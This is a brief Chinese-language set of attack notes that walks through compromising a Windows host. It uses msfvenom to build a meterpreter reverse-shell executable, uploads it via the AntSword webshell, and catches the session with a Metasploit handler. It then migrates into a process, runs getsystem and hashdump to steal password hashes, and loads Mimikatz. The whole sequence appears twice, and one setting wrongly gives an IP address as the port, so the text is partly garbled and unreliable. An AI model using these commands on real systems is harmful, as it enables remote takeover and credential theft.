1.msfvenom生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=4444 -f exe -o payload.exe
2. 蚁剑上传,Metasploit开启监听,命令执行payload.exe,获得 meterpreter
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4.4.4.4
exploit
3. meterpreter会话,注入64位进程
ps
migrate 1968 (Everything 进程)
4. 提权,获取用户密码的哈希值
getsystem
hashdump
5. 使用 Mimikatz
load kiwi
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=4444 -f exe -o payload.exe
2. 蚁剑上传,Metasploit开启监听,命令执行payload.exe,获得 meterpreter
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4.4.4.4
exploit
3. meterpreter会话,注入64位进程
ps
migrate 1968 (Everything 进程)
4. 提权,获取用户密码的哈希值
getsystem
hashdump
5. 使用 Mimikatz
load kiwi